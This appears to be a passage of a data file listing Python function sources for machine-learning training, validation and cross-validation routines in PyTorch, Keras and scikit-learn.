otherwise\n # we'd backprop through the entire training history\n h = tuple([each.data for each in h])\n\n # zero accumulated gradients\n self.model.zero_grad()\n # get the output from the model -\n output, h = self.model(inputs, h) # Input Should Be 3-Dimensional: seq_len, batch, input_size\n # calculate the loss and perform back propagation\n loss = self.criterion(output, targets.view(self.reader.batch_size * self.reader.sequence_length))\n loss.backward()\n # `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.\n nn.utils.clip_grad_norm_(self.model.parameters(), clip)\n self.optimizer.step()\n\n # loss stats\n if counter % print_every == 0:\n # Get validation loss\n val_h = self.model.init_hidden(self.reader.batch_size)\n val_losses = []\n self.model.eval()\n for x, y in self.reader.get_test_data(): # get_batches(val_data, batch_size, seq_length):\n\n x, y = torch.from_numpy(x), torch.from_numpy(y)\n\n # Creating new variables for the hidden state, otherwise\n # we'd backprop through the entire training history\n val_h = tuple([each.data for each in val_h])\n\n inputs, targets = x, y\n if self.model.train_on_gpu:\n inputs, targets = inputs.cuda(), targets.cuda()\n\n output, val_h = self.model(inputs, val_h)\n val_loss = self.criterion(output, targets.view(self.reader.batch_size * self.reader.sequence_length))\n\n val_losses.append(val_loss.item())\n\n self.model.train() # reset to train mode after iterationg through validation data\n print(\"Epoch: {}/{}...\".format(e + 1, self.epochs),\n \"Step: {}...\".format(counter),\n \"Loss: {:.4f}...\".format(loss.item()),\n \"Val Loss: {:.4f}\".format(np.mean(val_losses)))\n df = df.append({\n 'Epoch': \"{}/{}\".format(e + 1, self.epochs),\n 'Step': counter,\n 'Last Train Loss': loss.item(),\n 'Mean Test Loss': np.mean(val_losses)\n }, ignore_index=True)\n self.timer.stop()\n self.save_model()\n date = DateHelper.get_current_date()\n Export.append_df_to_excel(df, date)\n Export.append_df_to_excel(self.get_info(), date)", "def cross_valid(self, validation=True):\n for raw_model in self.models:\n train_accs = []\n test_accs = []\n valid_accs = []\n train_aucs = []\n test_aucs = []\n valid_aucs = []\n durations = []\n\n for i in range(self.reader.folds):\n if not validation:\n train_data, train_labels, test_data, test_labels = self.reader.read_train_test_fold(i)\n else:\n train_data, train_labels, test_data, test_labels, valid_data, valid_labels = \\\n self.reader.read_train_test_valid_fold(i)\n\n model = copy.deepcopy(raw_model)\n\n t1 = time.time()\n model.fit(train_data, train_labels)\n train_time = int(time.time() - t1)\n durations.append(train_time)\n\n train_predict_probs = model.predict_proba(train_data)\n test_predict_probs = model.predict_proba(test_data)\n if validation:\n valid_predict_probs = model.predict_proba(valid_data)\n\n # some model outputs probabilities for both classes. we only need probs for positive class.\n if len(train_predict_probs.shape) > 1:\n train_predict_probs = train_predict_probs[:, 1]\n if len(test_predict_probs.shape) > 1:\n test_predict_probs = test_predict_probs[:, 1]\n if validation and len(valid_predict_probs.shape) > 1:\n valid_predict_probs = valid_predict_probs[:, 1]\n\n train_auc = self.get_auc(train_labels, train_predict_probs)\n train_aucs.append(train_auc)\n test_auc = self.get_auc(test_labels, test_predict_probs)\n test_aucs.append(test_auc)\n if validation:\n valid_auc = self.get_auc(valid_labels, valid_predict_probs)\n valid_aucs.append(valid_auc)\n\n train_acc = self.get_acc(train_labels, train_predict_probs)\n train_accs.append(train_acc)\n test_acc = self.get_acc(test_labels, test_predict_probs)\n test_accs.append(test_acc)\n if validation:\n valid_acc = self.get_acc(valid_labels, valid_predict_probs)\n valid_accs.append(valid_acc)\n\n if not validation:\n print(\"{}, {}, {}, fold {}: train acc/auc: {:.5f}/{:.5f}, test acc/auc: {:.5f}/{:.5f}, train time: {}\"\n .format(self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n i, train_acc, train_auc, test_acc, test_auc, train_time))\n else:\n print(\n \"{}, {}, {}, fold {}: train acc/auc: {:.5f}/{:.5f}, test acc/auc: {:.5f}/{:.5f}, valid acc/auc: {:.5f}/{:.5f}, train time: {}\"\n .format(self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n i, train_acc, train_auc, test_acc, test_auc, valid_acc, valid_auc, train_time))\n\n if not validation:\n self.writer.write_result_train_test(\n self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n numpy.mean(durations), numpy.mean(train_accs), numpy.mean(train_aucs),\n numpy.mean(test_accs), numpy.mean(test_aucs))\n else:\n self.writer.write_result_train_test_valid(\n self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n numpy.mean(durations),\n numpy.mean(train_accs), numpy.mean(train_aucs),\n numpy.mean(test_accs), numpy.mean(test_aucs),\n numpy.mean(valid_accs), numpy.mean(valid_aucs),\n )\n\n self.reader.save_match_id_record()\n self.last_model = model", "def validate_pathloss_svr():\n svr = SVR(kernel='rbf', C=1.0, epsilon=0.2)\n linear_model = RandomForestRegressor()\n with open('pathloss_data.csv') as f:\n X, y = np.loadtxt(f, delimiter=',', usecols=(0, 1), unpack=True)\n kf = KFold(n_splits=10)\n mses = []\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n # svr.fit(X_train.reshape(-1, 1), y_train)\n # y_predict = svr.predict(X_test.reshape(-1, 1))\n linear_model.fit(X_train.reshape(-1, 1), y_train)\n y_predict = linear_model.predict(X_test.reshape(-1, 1))\n mse = np.sqrt(mean_squared_error(y_test, y_predict))\n mses.append(mse)\n print('Train fold: {}'.format(train_index))\n return mses", "def validate(val_loader, model, epoch, cfg):\n batch_time = meter.TimeMeter(True)\n data_time = meter.TimeMeter(True)\n prec = meter.ClassErrorMeter(topk=[1], accuracy=True)\n\n # testing mode\n model.eval()\n\n for i, (meshes, adjs, labels) in enumerate(val_loader):\n batch_time.reset()\n # bz x n x 3\n labels = labels.long().view(-1)\n\n # shift data to GPU\n if cfg.cuda:\n meshes = meshes.cuda()\n adjs = adjs.cuda()\n labels = labels.cuda()\n\n # forward, backward optimize\n preds = model(meshes, adjs)\n\n prec.add(preds.cpu().data.numpy(), labels.item())\n\n if i % cfg.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Batch Time {batch_time:.3f}\\t'\n 'Epoch Time {data_time:.3f}\\t'\n 'Prec@1 {top1:.3f}\\t'.format(\n epoch, i, len(val_loader), batch_time=batch_time.value(),\n data_time=data_time.value(), top1=prec.value(1)))\n\n print('mean class accuracy at epoch {0}: {1} '.format(epoch, prec.value(1)))\n\n return prec.value(1)", "def __init__(self,\r\n model_class=ModelLinear,\r\n loss_func=torch.nn.BCELoss(reduction='none'),\r\n scoring_func=None,\r\n epochs=1000, batch_size=-1,\r\n adam=False,\r\n lr=1e-1, momentum=0.9,\r\n l1_reg=0, l2_reg=0,\r\n weighted_samples=False,\r\n gpu=True, used_gpu=0, sample_gpu=False,\r\n verbose=0,\r\n **kwargs):\r\n super().__init__()\r\n\r\n self.model_class = model_class\r\n self.loss_func = loss_func\r\n self.scoring_func = scoring_func\r\n self.epochs = epochs\r\n self.batch_size = batch_size\r\n self.adam = adam\r\n self.lr = lr\r\n self.momentum = momentum\r\n self.l1_reg = l1_reg\r\n self.l2_reg = l2_reg\r\n self.weighted_samples = weighted_samples\r\n self.gpu = gpu\r\n self.used_gpu = used_gpu\r\n self.sample_gpu = sample_gpu\r\n self.verbose = verbose\r\n\r\n if kwargs:\r\n # additional arguments keys stored for use within fit()\r\n self.additional_args = list(kwargs)\r\n # additional arguments stored as properties for cross_val\r\n self.__dict__.update(kwargs)\r\n else:\r\n self.additional_args = []\r\n\r\n if verbose > 1:\r\n print(\"Model will be instanciated using the following arguments:\",\r\n self.__dict__)", "def validation_step(self, *args: Any, **kwargs: Any) -> None:\n batch = args[0]\n batch_idx = args[1]\n x = batch[\"image\"]\n y = batch[\"mask\"]\n y_hat = self(x)\n y_hat_hard = y_hat.argmax(dim=1)\n\n loss = self.loss(y_hat, y)\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n self.val_metrics(y_hat_hard, y)\n\n if (\n batch_idx < 10\n and hasattr(self.trainer, \"datamodule\")\n and self.logger\n and hasattr(self.logger, \"experiment\")\n and hasattr(self.logger.experiment, \"add_figure\")\n ):\n try:\n datamodule = self.trainer.datamodule\n batch[\"prediction\"] = y_hat_hard\n for key in [\"image\", \"mask\", \"prediction\"]:\n batch[key] = batch[key].cpu()\n sample = unbind_samples(batch)[0]\n fig = datamodule.plot(sample)\n summary_writer = self.logger.experiment\n summary_writer.add_figure(\n f\"image/{batch_idx}\", fig, global_step=self.global_step\n )\n plt.close()\n except ValueError:\n pass", "def train(model, ids, data, scaler):\n if model.model_type == 'torch':\n train_ids, val_ids, _, _ = train_test_split(ids, ids, test_size=0.1, random_state=1)\n train_loader = double_loader(data, train_ids, batch_size=model.batch_size)\n val_loader = double_loader(data, val_ids, batch_size=len(val_ids))\n \n regressor = copy.deepcopy(model.model) \n optimiser = model.optimiser(regressor.parameters(), lr=model.lr)\n loss_function = torch.nn.MSELoss()\n name = model.name.replace(' ','_')\n early_stopping = EarlyStopping(name,regressor)\n \n for epoch in range(model.num_epochs):\n #train\n for (sol,solv,targets) in train_loader:\n if model.data_type == 'sentences':\n sol, solv = sol.to(device), solv.to(device)\n targets = targets.view(-1,1)\n targets = scaler.transform(targets)\n optimiser.zero_grad()\n outputs = regressor(sol,solv).to(device)\n cuda_targets = targets.to(device)\n loss = loss_function(outputs, cuda_targets)\n loss.backward()\n optimiser.step()\n #evaluate\n for (sol,solv,targets) in val_loader:\n if model.data_type == 'sentences':\n sol, solv = sol.to(device), solv.to(device)\n targets = targets.view(-1,1)\n targets = scaler.transform(targets)\n outputs = regressor(sol,solv).to(device)\n cuda_targets = targets.to(device)\n loss = loss_function(outputs, cuda_targets)\n val_loss = loss.item()\n #early stopping\n early_stopping.store(val_loss, regressor)\n if early_stopping.stop:\n #print(\"Stopping at epoch \"+str(epoch))\n break\n regressor.load_state_dict(torch.load('checkpoints/'+name+'.pt'))\n else:\n regressor = sklearn.base.clone(model.model)\n targets = scaler.transform(data[1][ids])\n regressor.fit(data[0][ids], targets)\n return regressor", "def validate(net, val_data, ctx, eval_metric, size, args):\n clipper = gcv.nn.bbox.BBoxClipToImage()\n eval_metric.reset()\n # set nms threshold and topk constraint\n net.set_nms(nms_thresh=0.45, nms_topk=400)\n mx.nd.waitall()\n net.hybridize()\n\n with tqdm(total=size) as pbar:\n for ib, batch in enumerate(val_data):\n # if(ib >= 200):\n # break\n batch = split_and_load(batch, ctx_list=ctx)\n det_bboxes = []\n det_ids = []\n det_scores = []\n det_coefs = []\n det_infos = []\n\n for x, im_info in zip(*batch):\n # get prediction results\n t1 = time.time()\n ids, scores, bboxes, coefs = net(x)\n t2 = time.time()\n det_bboxes.append(clipper(bboxes, x))\n det_ids.append(ids)\n det_scores.append(scores)\n det_coefs.append(coefs)\n det_infos.append(im_info)\n\n # update metric\n for det_bbox, det_id, det_score, def_coef, det_info in zip(det_bboxes, det_ids, det_scores, det_coefs, det_infos):\n for i in range(det_info.shape[0]):\n # numpy everything\n det_bbox = det_bbox[i].asnumpy()\n det_id = det_id[i].asnumpy()\n det_score = det_score[i].asnumpy()\n def_coef = def_coef[i].asnumpy()\n det_info = det_info[i].asnumpy()\n # filter by conf threshold\n im_height, im_width = det_info\n valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]\n det_id = det_id[valid]\n det_score = det_score[valid]\n # To bbox of original img size\n det_bbox = det_bbox[valid]\n det_bbox[:, 0] *= (im_width / 416.0)\n det_bbox[:, 2] *= (im_width / 416.0)\n det_bbox[:, 1] *= (im_height / 416.0)\n det_bbox[:, 3] *= (im_height / 416.0)\n\n def_coef = def_coef[valid]\n eval_metric.update(det_bbox, det_id, det_score, def_coef, int(im_height), int(im_width))\n\n pbar.update(len(ctx))\n\n return eval_metric.get()", "def validation_dubo(latent_dim, covar_module0, covar_module1, likelihood, train_xt, m, log_v, z, P, T, eps):\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n v = torch.exp(log_v)\n torch_dtype = torch.double\n x_st = torch.reshape(train_xt, [P, T, train_xt.shape[1]]).to(device)\n stacked_x_st = torch.stack([x_st for i in range(latent_dim)], dim=1)\n K0xz = covar_module0(train_xt, z).evaluate().to(device)\n K0zz = (covar_module0(z, z).evaluate() + eps * torch.eye(z.shape[1], dtype=torch_dtype).to(device)).to(device)\n LK0zz = torch.cholesky(K0zz).to(device)\n iK0zz = torch.cholesky_solve(torch.eye(z.shape[1], dtype=torch_dtype).to(device), LK0zz).to(device)\n K0_st = covar_module0(stacked_x_st, stacked_x_st).evaluate().transpose(0,1)\n B_st = (covar_module1(stacked_x_st, stacked_x_st).evaluate() + torch.eye(T, dtype=torch.double).to(device) * likelihood.noise_covar.noise.unsqueeze(dim=2)).transpose(0,1)\n LB_st = torch.cholesky(B_st).to(device)\n iB_st = torch.cholesky_solve(torch.eye(T, dtype=torch_dtype).to(device), LB_st)\n\n dubo_sum = torch.tensor([0.0]).double().to(device)\n for i in range(latent_dim):\n m_st = torch.reshape(m[:, i], [P, T, 1]).to(device)\n v_st = torch.reshape(v[:, i], [P, T]).to(device)\n K0xz_st = torch.reshape(K0xz[i], [P, T, K0xz.shape[2]]).to(device)\n iB_K0xz = torch.matmul(iB_st[i], K0xz_st).to(device)\n K0zx_iB_K0xz = torch.matmul(torch.transpose(K0xz[i], 0, 1), torch.reshape(iB_K0xz, [P*T, K0xz.shape[2]])).to(device)\n W = K0zz[i] + K0zx_iB_K0xz\n W = (W + W.T) / 2\n LW = torch.cholesky(W).to(device)\n logDetK0zz = 2 * torch.sum(torch.log(torch.diagonal(LK0zz[i]))).to(device)\n logDetB = 2 * torch.sum(torch.log(torch.diagonal(LB_st[i], dim1=-2, dim2=-1))).to(device)\n logDetW = 2 * torch.sum(torch.log(torch.diagonal(LW))).to(device)\n logDetSigma = -logDetK0zz + logDetB + logDetW\n iB_m_st = torch.solve(m_st, B_st[i])[0].to(device)\n qF1 = torch.sum(m_st*iB_m_st).to(device)\n p = torch.matmul(K0xz[i].T, torch.reshape(iB_m_st, [P * T])).to(device)\n qF2 = torch.sum(torch.triangular_solve(p[:,None], LW, upper=False)[0] ** 2).to(device)\n qF = qF1 - qF2\n tr = torch.sum(iB_st[i] * K0_st[i]) - torch.sum(K0zx_iB_K0xz * iK0zz[i])\n logDetD = torch.sum(torch.log(v[:, i])).to(device)\n tr_iB_D = torch.sum(torch.diagonal(iB_st[i], dim1=-2, dim2=-1)*v_st).to(device)\n D05_iB_K0xz = torch.reshape(iB_K0xz*torch.sqrt(v_st)[:,:,None], [P*T, K0xz.shape[2]])\n K0zx_iB_D_iB_K0zx = torch.matmul(torch.transpose(D05_iB_K0xz,0,1), D05_iB_K0xz).to(device)\n tr_iB_K0xz_iW_K0zx_iB_D = torch.sum(torch.diagonal(torch.cholesky_solve(K0zx_iB_D_iB_K0zx, LW))).to(device)\n tr_iSigma_D = tr_iB_D - tr_iB_K0xz_iW_K0zx_iB_D\n dubo = 0.5*(tr_iSigma_D + qF - P*T + logDetSigma - logDetD + tr)\n dubo_sum = dubo_sum + dubo\n return dubo_sum", "def visualize_cross_validation_results(cross_val_results, plots_filepath):\n\n pair_model_scores, pair_model_stds, \\\n siamese_model_scores_2, siamese_model_stds_2, \\\n siamese_model_scores_10, siamese_model_stds_10 = cross_val_results\n param_names = (\"NBCH1\", \"NBCH2\", \"NBFCH\", \"BATCH_NORM\", \"SKIP_CON\", \"LR\")\n\n def aggregate_results(scores, stds):\n \"\"\"\n Helper function to aggregate score means and standard deviations for a model across parameter values\n\n :param scores: dictionary of score means {param_combo: score_mean}\n :param stds: dictionary of score stds {param_combo: score_std}\n\n :returns: list of tuples of pandas.Dataframe objects containing aggregated mean and std data\n \"\"\"\n\n scores = pd.DataFrame(scores.values(),\n index=scores.keys(),\n columns=[\"SCORE MEAN\", ])\n stds = pd.DataFrame(stds.values(),\n index=stds.keys(),\n columns=[\"SCORE STD\", ])\n scores.index.name = param_names\n stds.index.name = param_names\n data = []\n for param_gropby_levels in ((0,), (1,), (2,), (3, 4), (5,)):\n aggregate_scores = scores.groupby(level=param_gropby_levels).mean()\n aggregate_stds = scores.groupby(level=param_gropby_levels).std()\n data.append((aggregate_scores, aggregate_stds))\n return data\n\n pair_model_data = aggregate_results(pair_model_scores, pair_model_stds)\n siamese_model_2_data = aggregate_results(siamese_model_scores_2, siamese_model_stds_2)\n siamese_model_10_data = aggregate_results(siamese_model_scores_10, siamese_model_stds_10)\n\n # Group results for all models\n model_names = (\"Pair\", \"Siamese 2\", \"Siamese 10\")\n grouped_data = []\n for pair_model_group_data, siamese_model_2_group_data, siamese_model_10_group_data in zip(pair_model_data,\n siamese_model_2_data,\n siamese_model_10_data):\n score_means = (pair_model_group_data[0], siamese_model_2_group_data[0], siamese_model_10_group_data[0])\n score_mean_data = pd.concat(score_means, axis=1)\n score_mean_data.columns = model_names\n\n score_stds = (pair_model_group_data[1], siamese_model_2_group_data[1], siamese_model_10_group_data[1])\n score_std_data = pd.concat(score_stds, axis=1)\n score_std_data.columns = model_names\n\n grouped_data.append((score_mean_data, score_std_data))\n\n plots_param_names = (\"nbch1\", \"nbch2\", \"nbfch\", \"batch_norm+skip_con\", \"lr\")\n for i, (plot_param_names, (score_mean_data, score_std_data)) in enumerate(zip(plots_param_names, grouped_data)):\n plt.figure(figsize=(10, 5))\n score_mean_data.plot(kind=\"line\" if plot_param_names == \"lr\" else \"bar\",\n yerr=score_std_data,\n capsize=5,\n ylim=(0.4, 1.1),\n colormap=colormap_brg_darker)\n plt.title(\"Cross validation results for parameters:\\n{}\".format(plot_param_names), fontsize=18)\n plt.xlabel(\"Parameter value\", fontsize=14)\n plt.ylabel(\"Average accuracy\", fontsize=14)\n plt.xticks(fontsize=12, rotation=30)\n plt.yticks(fontsize=12)\n plt.legend(title=\"Model\", title_fontsize=10)\n plt.tight_layout()\n plt.savefig(fname=plots_filepath + \"cross_validation_{}.eps\".format(plot_param_names),\n dpi=\"figure\", format=\"eps\")\n plt.close()", "def performance_metrics(model, X_train, y_train, X_test, y_test, train=True, cv=True):\n from sklearn.metrics import accuracy_score, classification_report, confusion_matrix, f1_score \n from sklearn.metrics import precision_score, recall_score, roc_auc_score\n from sklearn.model_selection import cross_validate, cross_val_score, StratifiedKFold\n scoring = {'acc': 'accuracy',\n 'prec_micro': 'precision_micro',\n 'rec_micro': 'recall_micro',\n 'f1_micro': 'f1_micro',\n 'auc':'roc_auc'} \n if train==True:\n if cv==True:\n kfold=StratifiedKFold(n_splits=10, random_state=42)\n scores = cross_validate(model, X_train, y_train, scoring=scoring, cv=kfold)\n ypredTrain = model.predict(X_train)\n Acc_train = scores['test_acc'].mean()\n Precision_train = scores['test_prec_micro'].mean()\n Recall_train = scores['test_rec_micro'].mean()\n F1_train = scores['test_f1_micro'].mean()\n AUC_train = scores['test_auc'].mean()\n conf_matrix_train = confusion_matrix(y_train, ypredTrain)\n class_report = classification_report(y_train, ypredTrain)\n print(\"TRAIN:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_train:.2f}\\n\")\n print(f\"CV - Precision: {Precision_train:.2f}\\n\")\n print(f\"CV - Recall: {Recall_train:.2f}\\n\")\n print(f\"CV - F1 score: {F1_train:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_train:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_train}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\") \n elif cv==False:\n scores = cross_validate(model, X_train, y_train, scoring=scoring)\n ypredTrain = model.predict(X_train)\n Acc_train = scores['test_acc'].mean()\n Precision_train = scores['test_prec_micro'].mean()\n Recall_train = scores['test_rec_micro'].mean()\n F1_train = scores['test_f1_micro'].mean()\n AUC_train = scores['test_auc'].mean()\n conf_matrix_train = confusion_matrix(y_train, ypredTrain)\n class_report = classification_report(y_train, ypredTrain)\n print(\"TRAIN:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_train:.2f}\\n\")\n print(f\"CV - Precision: {Precision_train:.2f}\\n\")\n print(f\"CV - Recall: {Recall_train:.2f}\\n\")\n print(f\"CV - F1 score: {F1_train:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_train:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_train}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")\n elif train==False:\n if cv==True:\n kfold=StratifiedKFold(n_splits=10, random_state=42)\n scores = cross_validate(model, X_test, y_test, scoring=scoring, cv=kfold)\n ypredTest = model.predict(X_test)\n Acc_test = scores['test_acc'].mean()\n Precision_test = scores['test_prec_micro'].mean()\n Recall_test = scores['test_rec_micro'].mean()\n F1_test = scores['test_f1_micro'].mean()\n AUC_test = scores['test_auc'].mean()\n conf_matrix_test = confusion_matrix(y_test, ypredTest)\n class_report = classification_report(y_test, ypredTest) \n print(\"TEST:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_test:.2f}\\n\")\n print(f\"CV - Precision: {Precision_test:.2f}\\n\")\n print(f\"CV - Recall: {Recall_test:.2f}\\n\")\n print(f\"CV - F1 score: {F1_test:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_test:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_test}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")\n elif cv==False:\n scores = cross_validate(model, X_test, y_test, scoring=scoring)\n ypredTest = model.predict(X_test)\n Acc_test = scores['test_acc'].mean()\n Precision_test = scores['test_prec_micro'].mean()\n Recall_test = scores['test_rec_micro'].mean()\n F1_test = scores['test_f1_micro'].mean()\n AUC_test = scores['test_auc'].mean()\n conf_matrix_test = confusion_matrix(y_test, ypredTest)\n class_report = classification_report(y_test, ypredTest) \n print(\"TEST:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_test:.2f}\\n\")\n print(f\"CV - Precision: {Precision_test:.2f}\\n\")\n print(f\"CV - Recall: {Recall_test:.2f}\\n\")\n print(f\"CV - F1 score: {F1_test:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_test:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_test}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")", "def validation_step(self, batch, batch_idx):\n\n src_batch, trg_batch = batch\n\n src_seq = src_batch[\"src_ids\"]\n # change from [batch, seq_len] -> to [seq_len, batch]\n src_seq = src_seq.transpose(0, 1)\n src_lengths = src_batch[\"src_lengths\"]\n\n trg_seq = trg_batch[\"trg_ids\"]\n # change from [batch, seq_len] -> to [seq_len, batch]\n trg_seq = trg_seq.transpose(0, 1)\n trg_lengths = trg_batch[\"trg_lengths\"]\n\n outputs = self.forward(src_seq, src_lengths, trg_seq, 0)\n\n # # without sos token at the beginning and eos token at the end\n logits = outputs[1:].view(-1, self.output_dim)\n\n # trg = trg_seq[1:].view(-1)\n\n trg = trg_seq[1:].reshape(-1)\n\n # trg = [(trg len - 1) * batch size]\n # output = [(trg len - 1) * batch size, output dim]\n\n loss = self.loss(logits, trg)\n\n # take without first sos token, and reduce by 2 dimension, take index of max logits (make prediction)\n # seq_len * batch size * vocab_size -> seq_len * batch_size\n\n pred_seq = outputs[1:].argmax(2)\n\n # change layout: seq_len * batch_size -> batch_size * seq_len\n pred_seq = pred_seq.T\n\n # change layout: seq_len * batch_size -> batch_size * seq_len\n trg_batch = trg_seq[1:].T\n\n # compere list of predicted ids for all sequences in a batch to targets\n acc = plfunc.accuracy(pred_seq.reshape(-1), trg_batch.reshape(-1))\n\n # need to cast to list of predicted sequences (as list of token ids) [ [seq1_tok1, seq1_tok2, ...seq1_tokN],..., [seqK_tok1, seqK_tok2, ...seqK_tokZ]]\n predicted_ids = pred_seq.tolist()\n\n # need to add additional dim to each target reference sequence in order to\n # convert to format needed by bleu_score function [ seq1=[ [reference1], [reference2] ], seq2=[ [reference1] ] ]\n target_ids = torch.unsqueeze(trg_batch, 1).tolist()\n\n # bleu score needs two arguments\n # first: predicted_ids - list of predicted sequences as a list of predicted ids\n # second: target_ids - list of references (can be many, list)\n bleu_score = plfunc.nlp.bleu_score(predicted_ids, target_ids, n_gram=3).to(\n self.device\n ) # torch.unsqueeze(trg_batchT,1).tolist())\n\n self.log(\n \"val_loss\",\n loss,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n self.log(\n \"val_acc\",\n acc,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n self.log(\n \"val_bleu_idx\",\n bleu_score,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n\n return loss, acc, bleu_score", "def train_model(model,x_train, n_y_array,x_val, vald_array, Epochs_size, Batch_size):\n\n cb = EarlyStopping(monitor='val_loss', mode = \"min\", patience = 5 , verbose=1)\n\n mc = ModelCheckpoint(filepath='model_C3_15b.h5', monitor='val_loss', mode='min', save_best_only=True, verbose=1)\n\n print(\"training has started\")\n\n history = model.fit(x_train, n_y_array, callbacks = [cb,mc], validation_data=(x_val, vald_array),\n\n batch_size=Batch_size, nb_epoch=Epochs_size)\n\n return(history)", "def train_val_training(X_train, y_train, model):\n # set pach where trained models will be saved to \n savepath = Path('/home/kwaygo/Documents/NUS/SPH6004/P2/SPH6004_P2/models/Regression')\n checkpoint_name = os.path.join(savepath, 'Weights-{epoch:03d}--{val_loss:.5f}.hdf5' ) \n # define callbacks\n cp = ModelCheckpoint(checkpoint_name, monitor='val_loss', verbose = 1, save_best_only = True, mode ='auto')\n es = EarlyStopping(monitor='val_loss', patience= 4, verbose=1)\n callbacks_list = [es, cp]\n # start training\n hist = model.fit(X_train, y_train, epochs=500, batch_size=500, validation_split = 0.2, callbacks=callbacks_list) \n \n print(\"[INFO] avg. ICU LOS of train set: {}, std ICU LOS of test set: {}\".format(np.mean(y_train), np.std(y_train)))\n # plot training History \n plotHist(hist)\n return model", "def validate(model, criterion, valset, iteration, batch_size, n_gpus,\n collate_fn, logger, rank):\n \n model.eval()\n \n with torch.no_grad():\n val_sampler = DistributedSampler(valset) if n_gpus > 1 else None\n val_loader = DataLoader(\n valset,\n sampler=val_sampler,\n num_workers=1, \n shuffle=False,\n batch_size=batch_size,\n pin_memory=False,\n collate_fn=collate_fn\n )\n\n val_loss = 0.0\n\n for i, batch in enumerate(val_loader):\n x, y = model.parse_batch(batch)\n y_pred = model(x)\n loss = criterion(y_pred, y)\n reduced_val_loss = reduce_tensor(loss.data, n_gpus).item() \\\n if n_gpus > 1 else loss.item()\n val_loss += reduced_val_loss\n val_loss = val_loss / (i + 1)\n \n model.train()\n\n if rank == 0:\n print(\"Validation loss {}: {:9f} \".format(iteration, reduced_val_loss))\n logger.log_validation(reduced_val_loss, model, y, y_pred, iteration)\n \n return val_loss", "def set_cross_validation(x,y):\n\tx_train_1 = x[50:]\n\ty_train_1 = y[50:]\n\tx_test_1 = x[:50]\n\ty_test_1 = y[:50]\n\tx_train_2 = np.concatenate((x[:50], x[100:]),axis=0)\n\ty_train_2 = np.concatenate((y[:50], y[100:]),axis=0)\n\tx_test_2 = x[50:100]\n\ty_test_2 = y[50:100]\n\tx_train_3 = np.concatenate((x[:100], x[150:]),axis=0)\n\ty_train_3 = np.concatenate((y[:100], y[150:]),axis=0)\n\tx_test_3 = x[100:150]\n\ty_test_3 = y[100:150]\n\tx_train_4 = x[:150]\n\ty_train_4 = y[:150]\n\tx_test_4 = x[150:]\n\ty_test_4 = y[150:]\n\n\tx_train = [x_train_1,x_train_2,x_train_3,x_train_4]\n\ty_train = [y_train_1,y_train_2,y_train_3,y_train_4]\n\tx_test = [x_test_1,x_test_2,x_test_3,x_test_4]\n\ty_test = [y_test_1,y_test_2,y_test_3,y_test_4]\n\t# print 'cross val shapes', x_train.shape, y_train.shape, x_test.shape, y_test.shape\n\treturn x_train, y_train, x_test, y_test", "def test():\n real_clusters, ei = create_clusters()\n real_data, labels, step_nb = create_emitter_comparison_with_cluster(\n real_clusters, ei)\n logger.info(labels)\n\n model = Sequential()\n model.add(LSTM(units=128, input_shape=(2, 50)))\n model.add(Dense(1, activation=\"sigmoid\"))\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=[\n 'accuracy', f1_score_threshold(), precision_threshold(), recall_threshold()])\n model.load_weights(WEIGHTS_DIR+'/my_model_clusters_weights.h5')\n\n to_predict = np.array(real_data)\n predictions = model.predict(to_predict)\n predictions = np.array([k[0] for k in predictions])\n\n labels = np.array(labels)\n thresholdlist = np.arange(50, 2000, 50)\n\n recall_0_list = []\n recall_1_list = []\n precision_0_list = []\n precision_1_list = []\n\n for k in thresholdlist:\n scores, true_predictions, true_labels = prediction_processing(\n predictions, labels, k, step_nb)\n recall_1_list.append(scores[0])\n recall_0_list.append(scores[1])\n precision_1_list.append(scores[2])\n precision_0_list.append(scores[3])\n fig = plt.figure(0)\n ax = fig.add_subplot(2, 1, 1)\n plt.plot(thresholdlist, recall_0_list, 'bo',\n thresholdlist, recall_1_list, 'ro')\n\n ax2 = fig.add_subplot(2, 1, 2)\n\n plt.plot(thresholdlist, precision_0_list, 'bo',\n thresholdlist, precision_1_list, 'ro')\n plt.show()", "def validate(model, dataloader, criterion, device):\n\n # Prepare the model\n model.to(device)\n model.eval()\n\n # Creates metrics recorder\n metrics = Metrics()\n\n with torch.no_grad():\n # Iterates over batches\n for (_, inputs, labels) in Bar(dataloader):\n\n # Transforming inputs\n inputs, labels = inputs.to(device), labels.to(device)\n\n # Forward Pass\n outputs = model(inputs)\n\n # Get loss\n loss = criterion(outputs, labels)\n\n # Register on metrics\n _, predicted = torch.max(outputs.data, 1)\n metrics.batch(labels=labels, preds=predicted, loss=loss.item())\n\n # Print and return validation metrics\n metrics.print_one_liner(phase='Val')\n return metrics.summary()", "def fit(self, dataset, val_dataset=None, logging_path='', 